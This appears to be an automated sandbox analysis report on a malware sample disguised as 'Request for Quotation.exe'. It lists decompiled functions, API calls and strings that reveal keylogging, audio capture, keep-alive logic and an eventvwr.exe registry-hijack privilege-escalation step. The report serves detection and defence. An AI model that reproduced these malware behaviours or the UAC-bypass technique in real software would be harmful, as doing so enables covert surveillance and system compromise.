                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                • malloc.MSVCRT ref: 00405E37
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                • sprintf.MSVCRT ref: 00405E69
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                • SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                • free.MSVCRT(00000000), ref: 00405E9C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                • API String ID: 2201004561-248792730
                                                                                • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                                                                • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                                                                • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                                                                • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040122D, Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                                                                • #3.WS2_32 ref: 00401266
                                                                                • ExitThread.KERNEL32 ref: 00401274
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                                                                • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@wave
                                                                                • String ID:
                                                                                • API String ID: 3251938569-0
                                                                                • Opcode ID: 261b6f7c094be9f934f09ce18ff1ed9fdb1ee29c80e1dbdf0ee113b883a51e88
                                                                                • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                                                                • Opcode Fuzzy Hash: 261b6f7c094be9f934f09ce18ff1ed9fdb1ee29c80e1dbdf0ee113b883a51e88
                                                                                • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402637, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0x0
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                                                                0x0040263e
                                                                                0x00402644
                                                                                0x00000000
                                                                                0x00402749
                                                                                0x00402653
                                                                                0x00402669
                                                                                0x0040266f
                                                                                0x0040268b
                                                                                0x00402699
                                                                                0x004026a0
                                                                                0x004026a4
                                                                                0x004026ae
                                                                                0x004026b5
                                                                                0x004026b7
                                                                                0x004026bd
                                                                                0x004026c6
                                                                                0x004026cc
                                                                                0x004026cc
                                                                                0x004026d0
                                                                                0x004026d6
                                                                                0x004026dc
                                                                                0x004026f8
                                                                                0x00402706
                                                                                0x0040270d
                                                                                0x00402711
                                                                                0x0040271b
                                                                                0x00402722
                                                                                0x0040272a
                                                                                0x00402733
                                                                                0x00402733
                                                                                0x004026d6
                                                                                0x0040273c
                                                                                0x00402740
                                                                                0x00000000

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                                                                • printf.MSVCRT ref: 004026B5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                                                                • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                                                                • printf.MSVCRT ref: 00402722
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                                                                • API String ID: 1710008465-2297210016
                                                                                • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                                                                • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                                                                • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                                                                • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004030EC, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\Desktop\Request for Quotation.exe,?), ref: 0040318F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                                                                • exit.MSVCRT ref: 004031D8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                                                                Strings
                                                                                • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                                                                • eventvwr.exe, xrefs: 004031A6
                                                                                • origmsc, xrefs: 00403160
                                                                                • open, xrefs: 004031C6
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040318A
                                                                                • mscfile\shell\open\command, xrefs: 0040311C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                • API String ID: 2587331422-2563356844
                                                                                • Opcode ID: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                                                                • Opcode Fuzzy Hash: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D64E, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 102COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                                                                  • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                                                                  • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                                                                  • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                • open, xrefs: 0040D70B
                                                                                • C:\Users\user\Desktop\Request for Quotation.exe, xrefs: 0040D752
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$open
                                                                                • API String ID: 2112629403-3163107129
                                                                                • Opcode ID: 9b4f93c1b31942b18b1f72dc9b2dfc27091bc5646dae252cc341dd488c049f64
                                                                                • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                                                                • Opcode Fuzzy Hash: 9b4f93c1b31942b18b1f72dc9b2dfc27091bc5646dae252cc341dd488c049f64
                                                                                • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004030EC, Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040318F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                                                                • exit.MSVCRT ref: 004031D8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                                                                • String ID: Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                • API String ID: 2587331422-3923289169
                                                                                • Opcode ID: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                                                                • Opcode Fuzzy Hash: fcbf0af6d31253a8874abbd0374637abbeafe6e0dff6ad8f6dbf99a049f326b2
                                                                                • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                                                                  • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                                                                  • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                                                                  • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
